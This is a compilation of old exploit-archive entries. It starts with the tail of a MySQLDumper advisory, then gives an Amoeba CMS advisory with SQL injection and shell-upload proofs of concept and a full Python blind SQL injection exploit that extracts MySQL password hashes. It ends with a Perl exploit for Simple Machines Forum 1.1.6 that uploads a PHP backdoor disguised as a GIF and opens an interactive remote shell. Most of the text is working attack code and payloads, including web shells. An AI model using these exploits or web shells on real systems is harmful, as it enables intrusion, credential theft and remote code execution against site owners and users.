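        out['hardened_legit'] = attempt('mysqldumper', '.php')
        return out
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for key, value in demo().items():
        print('%-20s %s' % (key, value))
```

The realpath containment check is belt and braces on top of the allowlist; the allowlist alone already rejects every payload on this page, but the containment check also catches symlinks and names that a later change to the regex might let through. On PHP 5.3.4 and later the NUL-byte trick no longer works, but the '../' traversal does, so the fix has to cover both.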


Information Disclosure:
Direct access to these files generates many PHP notices:
http://192.168.0.15/learn/cubemail/restore.php

http://192.168.0.15/learn/cubemail/dump.php

http://192.168.0.15/learn/cubemail/refresh_dblist.php
Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147

NOTE: Previous versions may also be affected, but were not tested.

================================ EOF ======================================


+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^
Live 1335567729






MySQLDumper version 1.24.4 suffers from code execution, cross site request forgery, cross site scripting, local file inclusion, and directory traversal vulnerabilities.

mr_me/Amoeba CMS v1.01 multiple remote vulnerabilities ( php)

#!/usr/bin/python

"""
Amoeba CMS v1.01 multiple remote vulnerabilities:
Vendor: http://www.amoebacms.com/
Found by: mr_me
Contact date: 20/12/2010 2:37pm EST

SQL Injection:
=============
There are quite a few instances of pre/post-auth SQL injection in the web application. In one particular SQLi the attacker-
controlled input is used in multiple queries, and as such seems to fail on the second query when using the _ character,
which the second query treats as a wildcard (as per the MySQL manual). Therefore stealing data from the 'amb_users'
table may prove difficult. Additionally, ORDER BY SQL injection is present, which doubles the fun :0)

Pre-auth SQL Injection PoC (refer below to an automated working PoC):
---------------------------------------------------------------------
http://[target]/[path]/index.php?mod=cat&com=news&cpID=1+or+1=1 << true
http://[target]/[path]/index.php?mod=cat&com=news&cpID=1+or+1=2 << false

Post-auth SQL Injection PoCs:
-----------------------------
These will require the attacker to obtain access to the backend somehow. 
Only one cookie is needed to reach this backend (ambid).

PoC 1:
------
POST /[PATH]/admin/index.php?mod=group&com=menu HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ambid=5i5nrbl5d09f3ktqkh7sfe1s94
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

pageingsize=1+uNiOn+sEleCt+1,coNcAt(user_name,0x3a,users_password),3+from+amb_users--

PoC 2:
------
http://[target]/[path]/admin/index.php?mod=cat&com=gallery&cpID=1+or+1=1 << true
http://[target]/[path]/admin/index.php?mod=cat&com=gallery&cpID=1+or+1=2 << false

Shell Upload Vulnerability:
==========================
Interestingly enough, this application uses an extension whitelist that is stored in the database (amb_media_type)!
Unfortunately/fortunately it still accepts extra '.whatever' segments in the filename, as long as the name ends in an
extension that is on the whitelist. As a result the attacker can upload content with 'malicious' code inside and 'get a shell'
where an Apache AddType directive maps one of the inner extensions to PHP. Once the request is made, the application rewrites
the file into the original/ directory with the PHP time() value inserted into its name. See below:

PoC:
----
POST /webapps/amoeba2/admin/index.php?mod=manip&com=media&mediaType=IMAGE&name=lol.php.jpg HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ambid=5pk8u31pobv3qr0tci03o7tog5
Content-Type: application/octet-stream
Content-Length: 31

<?PHP system($_GET['cmd']); ?>

Server Response:
----------------
{"jsonrpc" : "2.0", "result" : null, "chunk" : "0", "chunks" : "0", "name" : "lol.php-1293423431.jpg", "id" : "id"}

Then we can access our shell at:
http://[target]/[path]/media/original/lol.php-1293423431.jpg?cmd=id 

Logic Flaws:
===========
Password disclosure & password reset:
--------------------
Password hash disclosure in the admin console. Just change uID to whatever your current uID is once you have stolen the admin cookie.
Additionally you can reset the admin's password without actually knowing the password. o_O Surprise surprise, it's the same link:

PoC:
---
http://[target]/[path]/admin/index.php?mod=list&com=user&uID=2&action=edit

"""

# Amoeba CMS v1.0.1 Remote Blind SQL Injection Exploit
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# 8 queries per char, much much cleaner.
#
# [mr_me@pluto amoeba]$ python amoeba0day.py -p 127.0.0.1:8080 -s 'whateva' -t 192.168.1.15 -d /webapps/amoeba2/
# 
#	| --------------------------------------------- |
#	| Amoeba CMS Remote Blind SQL Injection Exploit |
#	| by mr_me - net-ninja.net -------------------- |
#
# (+) Exploiting target @: http://192.168.1.15/webapps/amoeba2/
# (+) Testing Proxy @ 127.0.0.1:8080..
# (+) Proxy is working!
# (+) Using string 'whateva' for the true page
# (+) This will take time, go grab a coffee..
#
# (!) Getting database version: 5.1.41-3ubuntu12.8
# (!) Getting database user: root@localhost
# (!) Getting database name: amoeba2
# (!) w00t! You have access to MySQL database!
# (+) Dumping hashs hold onto your knickers..
# (+) The username and hashed password is: root:*EE4E2773D7530819563F0DC6FCE27446A51C9413
# (+) PoC finished.

import sys, urllib, re, socket
from optparse import OptionParser

# all possible decimal values of printable ascii characters
# 8 requests per char, much much cleaner.
lower_value = 0
upper_value = 126

vuluri = "index.php?mod=cat&com=news&cpID=1"
basicInfo = {'version':'version()', 'user':'user()', 'name':'database()'}

usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -s 'Author:' -t 192.168.2.15 -d /amoeba/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
parser.add_option("-s", type="string", action="store", dest="trueStr",
                  help="String that is on the 'true' page (used with the -b option)")

(options, args) = parser.parse_args()

def banner():
    print "\n\t| --------------------------------------------- |"
    print "\t| Amoeba CMS Remote Blind SQL Injection Exploit |"
    print "\t| by mr_me - net-ninja.net -------------------- |\n"

if len(sys.argv) < 5:
	banner()
	parser.print_help()
	sys.exit(1)

def setTargetHTTP():
	if options.target[0:7] != 'http://':
		options.target = "http://" + options.target
	return options.target
	
def getProxy():
	try:
		proxy = {'http': "http://"+options.proxy}
		opener = urllib.FancyURLopener(proxy)
	except socket.timeout:
		print "\n(-) Proxy Timed Out"
		sys.exit(1)
	except Exception, msg:
		print "\n(-) Proxy Failed: %s" % msg
		sys.exit(1)
	return opener
	
def getServerResponse(exploit):
	url = options.target+options.directory+exploit
	try:
		if options.proxy:
			opener = getProxy()
			check = opener.open(url).read()
		else:
			check = urllib.urlopen(url).read()
	except socket.error:
		print "(-) Target connection failed, check your address"
		sys.exit(1)
	except IOError:
		# Python 2 urllib raises IOError on HTTP errors; treat it as the "false" page
		check = ""
	return check

# modified version of rsauron's function 
# thanks bro. 
def getAsciiValue(URI):
	# binary search over the printable ASCII range: about 8 requests per character
	lower = lower_value
	upper = upper_value
	while lower < upper:
		try:
			mid = (lower + upper) / 2
			head_URI = URI + ">"+str(mid)
			result = getServerResponse(head_URI)
			match = re.findall(options.trueStr,result)
			if len(match) >= 1:
				lower = mid + 1
			else:
				upper = mid
		except (KeyboardInterrupt, SystemExit):
			raise
		except:
			pass

	if lower > lower_value and lower < upper_value:
		value = lower
	else:
		# boundary hit: confirm with an equality test before trusting it
		head_URI = URI + "="+str(lower)
		result = getServerResponse(head_URI)
		match = re.findall(options.trueStr,result)
		if len(match) >= 1:
			value = lower
		else:
			print "(-) READ xprog's blind sql tutorial!\n"
			sys.exit(1)
	return value

def doBlindSqlInjection():
	print "(+) Using string '%s' for the true page" % (options.trueStr)
	print "(+) This will take time, go grab a coffee.."
	for key in basicInfo:
		sys.stdout.write("\n(!) Getting database %s: " % (key))
		sys.stdout.flush()

		# it will never go through all 100 iterations: ascii() of an empty substring is 0
		for i in range(1,100):
			request = (vuluri+"+or+ascii(substring(%s,%s,1))" % (basicInfo[key],str(i)))
			asciival = getAsciiValue(request)
			if asciival != 0:
				sys.stdout.write("%s" % (chr(asciival)))
				sys.stdout.flush()
			else:
				break

	isMysqlUser = (vuluri+"+or+(select 1 from mysql.user limit 0,1)=1")
	result = getServerResponse(isMysqlUser)
	match = re.findall(options.trueStr,result)
	if len(match) >= 1:
		print "\n(!) w00t! You have access to MySQL database!"
		print "(+) Dumping hashs hold onto your knickers.."
		sys.stdout.write("(+) The username and hashed password is: ")
		sys.stdout.flush()
		for k in range(1,100):
			getMysqlUserAndPass = (vuluri+"+or+ascii(substring((SELECT+concat(user,0x3a,password)+from+"
				"mysql.user+limit+0,1),%s,1))" % str(k))
			asciival = getAsciiValue(getMysqlUserAndPass)
			if asciival != 0:
				sys.stdout.write("%s" % (chr(asciival)))
				sys.stdout.flush()
			else:
				break
	else:
		print "\n(-) You do not have access to MySQL database"

if __name__ == "__main__":
	banner()
	options.target = setTargetHTTP()
	print "(+) Exploiting target @: %s" % (options.target+options.directory)
	if options.proxy:
		print "(+) Testing Proxy @ %s.." % (options.proxy)
		opener = getProxy()
		try:
			check = opener.open("http://www.google.com").read()
		except:
			check = ""
		# check is a string; compare it as one (str >= int was always true in Python 2)
		if check:
			print "(+) Proxy is working!"
		else:
			print "(-) Proxy failed, exiting.."
			sys.exit(1)

	doBlindSqlInjection()	
	print "\n(+) PoC finished."


~elmysterio/Simple Machines Forum <= 1.1.6 (LFI) Code Execution Exploit ( php)

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod. 
#         We can't thank you enough for killing a bug killer. 
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#   
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@win32]$ ver
# 
# Microsoft Windows XP [Version 5.1.2600]
# 
# [cmd@win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s"; 

if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00). 
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php 
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit; 
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;

die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");

&shell
	if $ret->as_string =~ /expl0ited/;

$ret = $ua->request( 
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;

	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);
		
    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";
    
    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);
		

		exit
			unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }
        
        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
        }

        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}

# milw0rm.com [2008-11-05]


~elmysterio/smf-lfiexec.txt ( na)

Simple Machines Forum versions 1.1.6 and below local file inclusion code execution exploit.